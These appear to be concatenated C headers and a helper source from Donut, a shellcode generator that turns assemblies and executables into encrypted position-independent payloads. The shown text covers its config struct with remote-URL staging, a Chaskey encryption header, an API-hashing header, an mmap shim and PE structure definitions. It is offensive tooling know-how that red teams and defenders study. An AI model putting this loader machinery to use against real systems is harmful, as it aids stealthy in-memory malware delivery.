347 | char file[DONUT_MAX_NAME]; // assembly to create module from | |
348 | char url[DONUT_MAX_URL]; // points to root path of where module will be on remote http server | |
349 | char runtime[DONUT_MAX_NAME]; // runtime version to use. | |
350 | char modname[DONUT_MAX_NAME]; // name of module written to disk | |
351 | ||
352 | int mod_type; // DONUT_MODULE_DLL or DONUT_MODULE_EXE | |
353 | uint64_t mod_len; // size of DONUT_MODULE | |
354 | PDONUT_MODULE mod; // points to donut module | |
355 | ||
356 | int inst_type; // DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL | |
357 | uint64_t inst_len; // size of DONUT_INSTANCE | |
358 | PDONUT_INSTANCE inst; // points to donut instance | |
359 | ||
360 | uint64_t pic_len; // size of shellcode | |
361 | void* pic; // points to PIC/shellcode | |
362 | } DONUT_CONFIG, *PDONUT_CONFIG; | |
363 | ||
364 | #ifdef __cplusplus | |
365 | extern "C" { | |
366 | #endif | |
367 | ||
368 | #ifdef DLL | |
369 | #define EXPORT_FUNC __declspec(dllexport) | |
370 | #else | |
371 | #define EXPORT_FUNC | |
372 | #endif | |
373 | ||
374 | // public functions | |
375 | EXPORT_FUNC int DonutCreate(PDONUT_CONFIG); | |
376 | EXPORT_FUNC int DonutDelete(PDONUT_CONFIG); | |
377 | ||
378 | #ifdef __cplusplus | |
379 | } | |
380 | #endif | |
381 | ||
382 | #endif |
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2019, TheWover, Odzhan. All rights reserved. | |
4 | ||
5 | Redistribution and use in source and binary forms, with or without | |
6 | modification, are permitted provided that the following conditions are met: | |
7 | ||
8 | * Redistributions of source code must retain the above copyright notice, this | |
9 | list of conditions and the following disclaimer. | |
10 | ||
11 | * Redistributions in binary form must reproduce the above copyright notice, | |
12 | this list of conditions and the following disclaimer in the documentation | |
13 | and/or other materials provided with the distribution. | |
14 | ||
15 | * Neither the name of the copyright holder nor the names of its | |
16 | contributors may be used to endorse or promote products derived from | |
17 | this software without specific prior written permission. | |
18 | ||
19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
20 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
21 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
22 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
23 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
24 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
25 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
26 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
27 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
28 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
29 | */ | |
30 | ||
31 | #ifndef ENCRYPT_H | |
32 | #define ENCRYPT_H | |
33 | ||
34 | #include <stdint.h> | |
35 | #include <stddef.h> | |
36 | ||
37 | #ifndef ROTR32 | |
38 | #define ROTR32(v,n)(((v)>>(n))|((v)<<(32-(n)))) | |
39 | #endif | |
40 | ||
41 | // CHASKEY block cipher | |
42 | // 128-bit block with 128-bit key | |
43 | #define ENCRYPT chaskey | |
44 | ||
45 | #define CIPHER_BLK_LEN (128/8) | |
46 | #define CIPHER_KEY_LEN (128/8) | |
47 | ||
48 | #ifdef __cplusplus | |
49 | extern "C" { | |
50 | #endif | |
51 | ||
52 | void donut_encrypt(void *mk, void *ctr, void *data, size_t len); | |
53 | ||
54 | #define donut_decrypt(mk,ctr,data,len) donut_encrypt(mk,ctr,data,len) | |
55 | ||
56 | #ifdef __cplusplus | |
57 | } | |
58 | #endif | |
59 | ||
60 | #endif |
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2017 Odzhan. All rights reserved. | |
4 | ||
5 | Redistribution and use in source and binary forms, with or without | |
6 | modification, are permitted provided that the following conditions are met: | |
7 | ||
8 | * Redistributions of source code must retain the above copyright notice, this | |
9 | list of conditions and the following disclaimer. | |
10 | ||
11 | * Redistributions in binary form must reproduce the above copyright notice, | |
12 | this list of conditions and the following disclaimer in the documentation | |
13 | and/or other materials provided with the distribution. | |
14 | ||
15 | * Neither the name of the copyright holder nor the names of its | |
16 | contributors may be used to endorse or promote products derived from | |
17 | this software without specific prior written permission. | |
18 | ||
19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
20 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
21 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
22 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
23 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
24 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
25 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
26 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
27 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
28 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
29 | */ | |
30 | ||
31 | #ifndef MARU_H | |
32 | #define MARU_H | |
33 | ||
34 | #include <stdint.h> | |
35 | #include <string.h> | |
36 | ||
37 | void *Memset (void *ptr, int value, size_t num); | |
38 | ||
39 | #define MARU_MAX_STR 64 | |
40 | #define MARU_BLK_LEN 16 | |
41 | #define MARU_HASH_LEN 8 | |
42 | #define MARU_IV_LEN MARU_HASH_LEN | |
43 | #define MARU_CRYPT speck | |
44 | ||
45 | #ifndef ROTR32 | |
46 | #define ROTR32(v,n)(((v)>>(n))|((v)<<(32-(n)))) | |
47 | #endif | |
48 | ||
49 | #ifdef __cplusplus | |
50 | extern "C" { | |
51 | #endif | |
52 | ||
53 | uint64_t maru(const void *api, uint64_t iv); | |
54 | ||
55 | #ifdef __cplusplus | |
56 | } | |
57 | #endif | |
58 | ||
59 | #endif |
0 | /* mmap() replacement for Windows | |
1 | * | |
2 | * Author: Mike Frysinger <[email protected]> | |
3 | * Placed into the public domain | |
4 | */ | |
5 | ||
6 | /* References: | |
7 | * CreateFileMapping: http://msdn.microsoft.com/en-us/library/aa366537(VS.85).aspx | |
8 | * CloseHandle: http://msdn.microsoft.com/en-us/library/ms724211(VS.85).aspx | |
9 | * MapViewOfFile: http://msdn.microsoft.com/en-us/library/aa366761(VS.85).aspx | |
10 | * UnmapViewOfFile: http://msdn.microsoft.com/en-us/library/aa366882(VS.85).aspx | |
11 | */ | |
12 | ||
13 | #include "mmap.h" | |
14 | ||
15 | void *mmap(void *start, size_t length, int prot, int flags, int fd, off_t offset) | |
16 | { | |
17 | if (prot & ~(PROT_READ | PROT_WRITE | PROT_EXEC)) | |
18 | return MAP_FAILED; | |
19 | if (fd == -1) { | |
20 | if (!(flags & MAP_ANON) || offset) | |
21 | return MAP_FAILED; | |
22 | } else if (flags & MAP_ANON) | |
23 | return MAP_FAILED; | |
24 | ||
25 | DWORD flProtect; | |
26 | if (prot & PROT_WRITE) { | |
27 | if (prot & PROT_EXEC) | |
28 | flProtect = PAGE_EXECUTE_READWRITE; | |
29 | else | |
30 | flProtect = PAGE_READWRITE; | |
31 | } else if (prot & PROT_EXEC) { | |
32 | if (prot & PROT_READ) | |
33 | flProtect = PAGE_EXECUTE_READ; | |
34 | else if (prot & PROT_EXEC) | |
35 | flProtect = PAGE_EXECUTE; | |
36 | } else | |
37 | flProtect = PAGE_READONLY; | |
38 | ||
39 | off_t end = length + offset; | |
40 | HANDLE mmap_fd, h; | |
41 | if (fd == -1) | |
42 | mmap_fd = INVALID_HANDLE_VALUE; | |
43 | else | |
44 | mmap_fd = (HANDLE)_get_osfhandle(fd); | |
45 | h = CreateFileMapping(mmap_fd, NULL, flProtect, DWORD_HI(end), DWORD_LO(end), NULL); | |
46 | if (h == NULL) | |
47 | return MAP_FAILED; | |
48 | ||
49 | DWORD dwDesiredAccess; | |
50 | if (prot & PROT_WRITE) | |
51 | dwDesiredAccess = FILE_MAP_WRITE; | |
52 | else | |
53 | dwDesiredAccess = FILE_MAP_READ; | |
54 | if (prot & PROT_EXEC) | |
55 | dwDesiredAccess |= FILE_MAP_EXECUTE; | |
56 | if (flags & MAP_PRIVATE) | |
57 | dwDesiredAccess |= FILE_MAP_COPY; | |
58 | void *ret = MapViewOfFile(h, dwDesiredAccess, DWORD_HI(offset), DWORD_LO(offset), length); | |
59 | if (ret == NULL) { | |
60 | CloseHandle(h); | |
61 | ret = MAP_FAILED; | |
62 | } | |
63 | return ret; | |
64 | } | |
65 | ||
66 | void munmap(void *addr, size_t length) | |
67 | { | |
68 | UnmapViewOfFile(addr); | |
69 | /* ruh-ro, we leaked handle from CreateFileMapping() ... */ | |
70 | } | |
71 | ||
72 | #undef DWORD_HI | |
73 | #undef DWORD_LO |
0 | ||
1 | ||
2 | #ifndef MMAP_H | |
3 | #define MMAP_H | |
4 | ||
5 | #include <io.h> | |
6 | #include <windows.h> | |
7 | #include <sys/types.h> | |
8 | ||
9 | #define PROT_READ 0x1 | |
10 | #define PROT_WRITE 0x2 | |
11 | /* This flag is only available in WinXP+ */ | |
12 | #ifdef FILE_MAP_EXECUTE | |
13 | #define PROT_EXEC 0x4 | |
14 | #else | |
15 | #define PROT_EXEC 0x0 | |
16 | #define FILE_MAP_EXECUTE 0 | |
17 | #endif | |
18 | ||
19 | #define MAP_SHARED 0x01 | |
20 | #define MAP_PRIVATE 0x02 | |
21 | #define MAP_ANONYMOUS 0x20 | |
22 | #define MAP_ANON MAP_ANONYMOUS | |
23 | #define MAP_FAILED ((void *) -1) | |
24 | ||
25 | #ifdef __USE_FILE_OFFSET64 | |
26 | # define DWORD_HI(x) (x >> 32) | |
27 | # define DWORD_LO(x) ((x) & 0xffffffff) | |
28 | #else | |
29 | # define DWORD_HI(x) (0) | |
30 | # define DWORD_LO(x) (x) | |
31 | #endif | |
32 | ||
33 | #ifdef __cplusplus | |
34 | extern "C" { | |
35 | #endif | |
36 | ||
37 | void *mmap(void *start, size_t length, int prot, int flags, int fd, off_t offset); | |
38 | void munmap(void *addr, size_t length); | |
39 | ||
40 | #ifdef __cplusplus | |
41 | } | |
42 | #endif | |
43 | ||
44 | #endif⏎ |
0 | ||
1 | #ifndef PE_H | |
2 | #define PE_H | |
3 | ||
4 | #include "wintypes.h" | |
5 | ||
6 | // | |
7 | // Image Format | |
8 | // | |
9 | ||
10 | ||
11 | #ifndef _MAC | |
12 | ||
13 | #include "pshpack4.h" // 4 byte packing is the default | |
14 | ||
15 | #define IMAGE_DOS_SIGNATURE 0x5A4D // MZ | |
16 | #define IMAGE_OS2_SIGNATURE 0x454E // NE | |
17 | #define IMAGE_OS2_SIGNATURE_LE 0x454C // LE | |
18 | #define IMAGE_VXD_SIGNATURE 0x454C // LE | |
19 | #define IMAGE_NT_SIGNATURE 0x00004550 // PE00 | |
20 | ||
21 | #include "pshpack2.h" // 16 bit headers are 2 byte packed | |
22 | ||
23 | #else | |
24 | ||
25 | #include "pshpack1.h" | |
26 | ||
27 | #define IMAGE_DOS_SIGNATURE 0x4D5A // MZ | |
28 | #define IMAGE_OS2_SIGNATURE 0x4E45 // NE | |
29 | #define IMAGE_OS2_SIGNATURE_LE 0x4C45 // LE | |
30 | #define IMAGE_NT_SIGNATURE 0x50450000 // PE00 | |
31 | #endif | |
32 | ||
33 | typedef struct _IMAGE_DOS_HEADER { // DOS .EXE header | |
34 | WORD e_magic; // Magic number | |
35 | WORD e_cblp; // Bytes on last page of file | |
36 | WORD e_cp; // Pages in file | |
37 | WORD e_crlc; // Relocations | |
38 | WORD e_cparhdr; // Size of header in paragraphs | |
39 | WORD e_minalloc; // Minimum extra paragraphs needed | |
40 | WORD e_maxalloc; // Maximum extra paragraphs needed | |
41 | WORD e_ss; // Initial (relative) SS value | |
42 | WORD e_sp; // Initial SP value | |
43 | WORD e_csum; // Checksum | |
44 | WORD e_ip; // Initial IP value | |
45 | WORD e_cs; // Initial (relative) CS value | |
46 | WORD e_lfarlc; // File address of relocation table | |
47 | WORD e_ovno; // Overlay number | |
48 | WORD e_res[4]; // Reserved words | |
49 | WORD e_oemid; // OEM identifier (for e_oeminfo) | |
50 | WORD e_oeminfo; // OEM information; e_oemid specific | |
51 | WORD e_res2[10]; // Reserved words | |
52 | LONG e_lfanew; // File address of new exe header | |
53 | } IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER; | |
54 | ||
55 | #ifndef _MAC | |
56 | #include "poppack.h" // Back to 4 byte packing | |
57 | #endif | |
58 | ||
59 | // | |
60 | // File header format. | |
61 | // | |
62 | ||
63 | typedef struct _IMAGE_FILE_HEADER { | |
64 | WORD Machine; | |
65 | WORD NumberOfSections; | |
66 | DWORD TimeDateStamp; | |
67 | DWORD PointerToSymbolTable; | |
68 | DWORD NumberOfSymbols; | |
69 | WORD SizeOfOptionalHeader; | |
70 | WORD Characteristics; | |
71 | } IMAGE_FILE_HEADER, *PIMAGE_FILE_HEADER; | |
72 | ||
73 | #define IMAGE_SIZEOF_FILE_HEADER 20 | |
74 | ||
75 | #define IMAGE_FILE_RELOCS_STRIPPED 0x0001 // Relocation info stripped from file. | |
76 | #define IMAGE_FILE_EXECUTABLE_IMAGE 0x0002 // File is executable (i.e. no unresolved externel references). | |
77 | #define IMAGE_FILE_LINE_NUMS_STRIPPED 0x0004 // Line nunbers stripped from file. | |
78 | #define IMAGE_FILE_LOCAL_SYMS_STRIPPED 0x0008 // Local symbols stripped from file. | |
79 | #define IMAGE_FILE_AGGRESIVE_WS_TRIM 0x0010 // Agressively trim working set | |
80 | #define IMAGE_FILE_LARGE_ADDRESS_AWARE 0x0020 // App can handle >2gb addresses | |
81 | #define IMAGE_FILE_BYTES_REVERSED_LO 0x0080 // Bytes of machine word are reversed. | |
82 | #define IMAGE_FILE_32BIT_MACHINE 0x0100 // 32 bit word machine. | |
83 | #define IMAGE_FILE_DEBUG_STRIPPED 0x0200 // Debugging info stripped from file in .DBG file | |
84 | #define IMAGE_FILE_REMOVABLE_RUN_FROM_SWAP 0x0400 // If Image is on removable media, copy and run from the swap file. | |
85 | #define IMAGE_FILE_NET_RUN_FROM_SWAP 0x0800 // If Image is on Net, copy and run from the swap file. | |
86 | #define IMAGE_FILE_SYSTEM 0x1000 // System File. | |
87 | #define IMAGE_FILE_DLL 0x2000 // File is a DLL. | |
88 | #define IMAGE_FILE_UP_SYSTEM_ONLY 0x4000 // File should only be run on a UP machine | |
89 | #define IMAGE_FILE_BYTES_REVERSED_HI 0x8000 // Bytes of machine word are reversed. | |
90 | ||
91 | #define IMAGE_FILE_MACHINE_UNKNOWN 0 | |
92 | #define IMAGE_FILE_MACHINE_I386 0x014c // Intel 386. | |
93 | #define IMAGE_FILE_MACHINE_R3000 0x0162 // MIPS little-endian, 0x160 big-endian | |
94 | #define IMAGE_FILE_MACHINE_R4000 0x0166 // MIPS little-endian | |
95 | #define IMAGE_FILE_MACHINE_R10000 0x0168 // MIPS little-endian | |
96 | #define IMAGE_FILE_MACHINE_WCEMIPSV2 0x0169 // MIPS little-endian WCE v2 | |
97 | #define IMAGE_FILE_MACHINE_ALPHA 0x0184 // Alpha_AXP | |
98 | #define IMAGE_FILE_MACHINE_SH3 0x01a2 // SH3 little-endian | |
99 | #define IMAGE_FILE_MACHINE_SH3DSP 0x01a3 | |
100 | #define IMAGE_FILE_MACHINE_SH3E 0x01a4 // SH3E little-endian | |
101 | #define IMAGE_FILE_MACHINE_SH4 0x01a6 // SH4 little-endian | |
102 | #define IMAGE_FILE_MACHINE_SH5 0x01a8 // SH5 | |
103 | #define IMAGE_FILE_MACHINE_ARM 0x01c0 // ARM Little-Endian | |
104 | #define IMAGE_FILE_MACHINE_THUMB 0x01c2 | |
105 | #define IMAGE_FILE_MACHINE_AM33 0x01d3 | |
106 | #define IMAGE_FILE_MACHINE_POWERPC 0x01F0 // IBM PowerPC Little-Endian | |
107 | #define IMAGE_FILE_MACHINE_POWERPCFP 0x01f1 | |
108 | #define IMAGE_FILE_MACHINE_IA64 0x0200 // Intel 64 | |
109 | #define IMAGE_FILE_MACHINE_MIPS16 0x0266 // MIPS | |
110 | #define IMAGE_FILE_MACHINE_ALPHA64 0x0284 // ALPHA64 | |
111 | #define IMAGE_FILE_MACHINE_MIPSFPU 0x0366 // MIPS | |
112 | #define IMAGE_FILE_MACHINE_MIPSFPU16 0x0466 // MIPS | |
113 | #define IMAGE_FILE_MACHINE_AXP64 IMAGE_FILE_MACHINE_ALPHA64 | |
114 | #define IMAGE_FILE_MACHINE_TRICORE 0x0520 // Infineon | |
115 | #define IMAGE_FILE_MACHINE_CEF 0x0CEF | |
116 | #define IMAGE_FILE_MACHINE_EBC 0x0EBC // EFI Byte Code | |
117 | #define IMAGE_FILE_MACHINE_AMD64 0x8664 // AMD64 (K8) | |
118 | #define IMAGE_FILE_MACHINE_M32R 0x9041 // M32R little-endian | |
119 | #define IMAGE_FILE_MACHINE_CEE 0xC0EE | |
120 | ||
121 | // | |
122 | // Directory format. | |
123 | // | |
124 | ||
125 | typedef struct _IMAGE_DATA_DIRECTORY { | |
126 | DWORD VirtualAddress; | |
127 | DWORD Size; | |
128 | } IMAGE_DATA_DIRECTORY, *PIMAGE_DATA_DIRECTORY; | |
129 | ||
130 | #define IMAGE_NUMBEROF_DIRECTORY_ENTRIES 16 | |
131 | ||
132 | // | |
133 | // Optional header format. | |
134 | // | |
135 | ||
136 | typedef struct _IMAGE_OPTIONAL_HEADER { | |
137 | // | |
138 | // Standard fields. | |
139 | // | |
140 | ||
141 | WORD Magic; | |
142 | BYTE MajorLinkerVersion; | |
143 | BYTE MinorLinkerVersion; | |
144 | DWORD SizeOfCode; | |
145 | DWORD SizeOfInitializedData; | |
146 | DWORD SizeOfUninitializedData; | |
147 | DWORD AddressOfEntryPoint; | |
148 | DWORD BaseOfCode; | |
149 | DWORD BaseOfData; | |
150 | ||
151 | // | |
152 | // NT additional fields. | |
153 | // | |
154 | ||
155 | DWORD ImageBase; | |
156 | DWORD SectionAlignment; | |
157 | DWORD FileAlignment; | |
158 | WORD MajorOperatingSystemVersion; | |
159 | WORD MinorOperatingSystemVersion; | |
160 | WORD MajorImageVersion; | |
161 | WORD MinorImageVersion; | |
162 | WORD MajorSubsystemVersion; | |
163 | WORD MinorSubsystemVersion; | |
164 | DWORD Win32VersionValue; | |
165 | DWORD SizeOfImage; | |
166 | DWORD SizeOfHeaders; | |
167 | DWORD CheckSum; | |
168 | WORD Subsystem; | |
169 | WORD DllCharacteristics; | |
170 | DWORD SizeOfStackReserve; | |
171 | DWORD SizeOfStackCommit; | |
172 | DWORD SizeOfHeapReserve; | |
173 | DWORD SizeOfHeapCommit; | |
174 | DWORD LoaderFlags; | |
175 | DWORD NumberOfRvaAndSizes; | |
176 | IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES]; | |
177 | } IMAGE_OPTIONAL_HEADER32, *PIMAGE_OPTIONAL_HEADER32; | |
178 | ||
179 | typedef struct _IMAGE_OPTIONAL_HEADER64 { | |
180 | WORD Magic; | |
181 | BYTE MajorLinkerVersion; | |
182 | BYTE MinorLinkerVersion; | |
183 | DWORD SizeOfCode; | |
184 | DWORD SizeOfInitializedData; | |
185 | DWORD SizeOfUninitializedData; | |
186 | DWORD AddressOfEntryPoint; | |
187 | DWORD BaseOfCode; | |
188 | ULONGLONG ImageBase; | |
189 | DWORD SectionAlignment; | |
190 | DWORD FileAlignment; | |
191 | WORD MajorOperatingSystemVersion; | |
192 | WORD MinorOperatingSystemVersion; | |
193 | WORD MajorImageVersion; | |
194 | WORD MinorImageVersion; | |
195 | WORD MajorSubsystemVersion; | |
196 | WORD MinorSubsystemVersion; | |
197 | DWORD Win32VersionValue; | |
198 | DWORD SizeOfImage; | |
199 | DWORD SizeOfHeaders; | |
200 | DWORD CheckSum; | |
201 | WORD Subsystem; | |
202 | WORD DllCharacteristics; | |
203 | ULONGLONG SizeOfStackReserve; | |
204 | ULONGLONG SizeOfStackCommit; | |
205 | ULONGLONG SizeOfHeapReserve; | |
206 | ULONGLONG SizeOfHeapCommit; | |
207 | DWORD LoaderFlags; | |
208 | DWORD NumberOfRvaAndSizes; | |
209 | IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES]; | |
210 | } IMAGE_OPTIONAL_HEADER64, *PIMAGE_OPTIONAL_HEADER64; | |
211 | ||
212 | #define IMAGE_NT_OPTIONAL_HDR32_MAGIC 0x10b | |
213 | #define IMAGE_NT_OPTIONAL_HDR64_MAGIC 0x20b | |
214 | #define IMAGE_ROM_OPTIONAL_HDR_MAGIC 0x107 | |
215 | ||
216 | #ifdef _WIN64 | |
217 | typedef IMAGE_OPTIONAL_HEADER64 IMAGE_OPTIONAL_HEADER; | |
218 | typedef PIMAGE_OPTIONAL_HEADER64 PIMAGE_OPTIONAL_HEADER; | |
219 | #define IMAGE_NT_OPTIONAL_HDR_MAGIC IMAGE_NT_OPTIONAL_HDR64_MAGIC | |
220 | #else | |
221 | typedef IMAGE_OPTIONAL_HEADER32 IMAGE_OPTIONAL_HEADER; | |
222 | typedef PIMAGE_OPTIONAL_HEADER32 PIMAGE_OPTIONAL_HEADER; | |
223 | #define IMAGE_NT_OPTIONAL_HDR_MAGIC IMAGE_NT_OPTIONAL_HDR32_MAGIC | |
224 | #endif | |
225 | ||
226 | typedef struct _IMAGE_NT_HEADERS64 { | |
227 | DWORD Signature; | |
228 | IMAGE_FILE_HEADER FileHeader; | |
229 | IMAGE_OPTIONAL_HEADER64 OptionalHeader; | |
230 | } IMAGE_NT_HEADERS64, *PIMAGE_NT_HEADERS64; | |
231 | ||
232 | typedef struct _IMAGE_NT_HEADERS { | |
233 | DWORD Signature; | |
234 | IMAGE_FILE_HEADER FileHeader; | |
235 | IMAGE_OPTIONAL_HEADER32 OptionalHeader; | |
236 | } IMAGE_NT_HEADERS32, *PIMAGE_NT_HEADERS32; | |
237 | ||
238 | #if defined(_WIN32) | |
239 | typedef IMAGE_NT_HEADERS32 IMAGE_NT_HEADERS; | |
240 | typedef PIMAGE_NT_HEADERS32 PIMAGE_NT_HEADERS; | |
241 | #else | |
242 | typedef IMAGE_NT_HEADERS64 IMAGE_NT_HEADERS; | |
243 | typedef PIMAGE_NT_HEADERS64 PIMAGE_NT_HEADERS; | |
244 | #endif | |
245 | ||
246 | // IMAGE_FIRST_SECTION doesn't need 32/64 versions since the file header is the same either way. | |
247 | ||
248 | #define IMAGE_FIRST_SECTION( ntheader ) ((PIMAGE_SECTION_HEADER) \ | |
249 | ((ULONG_PTR)(ntheader) + \ | |
250 | offsetof( IMAGE_NT_HEADERS, OptionalHeader ) + \ | |
251 | ((ntheader))->FileHeader.SizeOfOptionalHeader \ | |
252 | )) | |
253 | ||
254 | // Subsystem Values | |
255 | ||
256 | #define IMAGE_SUBSYSTEM_UNKNOWN 0 // Unknown subsystem. | |
257 | #define IMAGE_SUBSYSTEM_NATIVE 1 // Image doesn't require a subsystem. | |
258 | #define IMAGE_SUBSYSTEM_WINDOWS_GUI 2 // Image runs in the Windows GUI subsystem. | |
259 | #define IMAGE_SUBSYSTEM_WINDOWS_CUI 3 // Image runs in the Windows character subsystem. | |
260 | #define IMAGE_SUBSYSTEM_OS2_CUI 5 // image runs in the OS/2 character subsystem. | |
261 | #define IMAGE_SUBSYSTEM_POSIX_CUI 7 // image runs in the Posix character subsystem. | |
262 | #define IMAGE_SUBSYSTEM_NATIVE_WINDOWS 8 // image is a native Win9x driver. | |
263 | #define IMAGE_SUBSYSTEM_WINDOWS_CE_GUI 9 // Image runs in the Windows CE subsystem. | |
264 | #define IMAGE_SUBSYSTEM_EFI_APPLICATION 10 // | |
265 | #define IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER 11 // | |
266 | #define IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER 12 // | |
267 | #define IMAGE_SUBSYSTEM_EFI_ROM 13 | |
268 | #define IMAGE_SUBSYSTEM_XBOX 14 | |
269 | #define IMAGE_SUBSYSTEM_WINDOWS_BOOT_APPLICATION 16 | |
270 | ||
271 | // DllCharacteristics Entries | |
272 | ||
273 | // IMAGE_LIBRARY_PROCESS_INIT 0x0001 // Reserved. | |
274 | // IMAGE_LIBRARY_PROCESS_TERM 0x0002 // Reserved. | |
275 | // IMAGE_LIBRARY_THREAD_INIT 0x0004 // Reserved. | |
276 | // IMAGE_LIBRARY_THREAD_TERM 0x0008 // Reserved. | |
277 | #define IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE 0x0040 // DLL can move. | |
278 | #define IMAGE_DLLCHARACTERISTICS_FORCE_INTEGRITY 0x0080 // Code Integrity Image | |
279 | #define IMAGE_DLLCHARACTERISTICS_NX_COMPAT 0x0100 // Image is NX compatible | |
280 | #define IMAGE_DLLCHARACTERISTICS_NO_ISOLATION 0x0200 // Image understands isolation and doesn't want it | |
281 | #define IMAGE_DLLCHARACTERISTICS_NO_SEH 0x0400 // Image does not use SEH. No SE handler may reside in this image | |
282 | #define IMAGE_DLLCHARACTERISTICS_NO_BIND 0x0800 // Do not bind this image. | |
283 | // 0x1000 // Reserved. | |
284 | #define IMAGE_DLLCHARACTERISTICS_WDM_DRIVER 0x2000 // Driver uses WDM model | |
285 | // 0x4000 // Reserved. | |
286 | #define IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE 0x8000 | |
287 | ||
288 | // Directory Entries | |
289 | ||
290 | #define IMAGE_DIRECTORY_ENTRY_EXPORT 0 // Export Directory | |
291 | #define IMAGE_DIRECTORY_ENTRY_IMPORT 1 // Import Directory | |
292 | #define IMAGE_DIRECTORY_ENTRY_RESOURCE 2 // Resource Directory | |
293 | #define IMAGE_DIRECTORY_ENTRY_EXCEPTION 3 // Exception Directory | |
294 | #define IMAGE_DIRECTORY_ENTRY_SECURITY 4 // Security Directory | |
295 | #define IMAGE_DIRECTORY_ENTRY_BASERELOC 5 // Base Relocation Table | |
296 | #define IMAGE_DIRECTORY_ENTRY_DEBUG 6 // Debug Directory | |
297 | // IMAGE_DIRECTORY_ENTRY_COPYRIGHT 7 // (X86 usage) | |
298 | #define IMAGE_DIRECTORY_ENTRY_ARCHITECTURE 7 // Architecture Specific Data | |
299 | #define IMAGE_DIRECTORY_ENTRY_GLOBALPTR 8 // RVA of GP | |
300 | #define IMAGE_DIRECTORY_ENTRY_TLS 9 // TLS Directory | |
301 | #define IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG 10 // Load Configuration Directory | |
302 | #define IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT 11 // Bound Import Directory in headers | |
303 | #define IMAGE_DIRECTORY_ENTRY_IAT 12 // Import Address Table | |
304 | #define IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT 13 // Delay Load Import Descriptors | |
305 | #define IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR 14 // COM Runtime descriptor | |
306 | ||
307 | // | |
308 | // Section header format. | |
309 | // | |
310 | ||
311 | #define IMAGE_SIZEOF_SHORT_NAME 8 | |
312 | ||
313 | typedef struct _IMAGE_SECTION_HEADER { | |
314 | BYTE Name[IMAGE_SIZEOF_SHORT_NAME]; | |
315 | union { | |
316 | DWORD PhysicalAddress; | |
317 | DWORD VirtualSize; | |
318 | } Misc; | |
319 | DWORD VirtualAddress; | |
320 | DWORD SizeOfRawData; | |
321 | DWORD PointerToRawData; | |
322 | DWORD PointerToRelocations; | |
323 | DWORD PointerToLinenumbers; | |
324 | WORD NumberOfRelocations; | |
325 | WORD NumberOfLinenumbers; | |
326 | DWORD Characteristics; | |
327 | } IMAGE_SECTION_HEADER, *PIMAGE_SECTION_HEADER; | |
328 | ||
329 | #define IMAGE_SIZEOF_SECTION_HEADER 40 | |
330 | ||
331 | // | |
332 | // Section characteristics. | |
333 | // | |
334 | // IMAGE_SCN_TYPE_REG 0x00000000 // Reserved. | |
335 | // IMAGE_SCN_TYPE_DSECT 0x00000001 // Reserved. | |
336 | // IMAGE_SCN_TYPE_NOLOAD 0x00000002 // Reserved. | |
337 | // IMAGE_SCN_TYPE_GROUP 0x00000004 // Reserved. | |
338 | #define IMAGE_SCN_TYPE_NO_PAD 0x00000008 // Reserved. | |
339 | // IMAGE_SCN_TYPE_COPY 0x00000010 // Reserved. | |
340 | ||
341 | #define IMAGE_SCN_CNT_CODE 0x00000020 // Section contains code. | |
342 | #define IMAGE_SCN_CNT_INITIALIZED_DATA 0x00000040 // Section contains initialized data. | |
343 | #define IMAGE_SCN_CNT_UNINITIALIZED_DATA 0x00000080 // Section contains uninitialized data. | |
344 | ||
345 | #define IMAGE_SCN_LNK_OTHER 0x00000100 // Reserved. | |
346 | #define IMAGE_SCN_LNK_INFO 0x00000200 // Section contains comments or some other type of information. | |
347 | // IMAGE_SCN_TYPE_OVER 0x00000400 // Reserved. | |
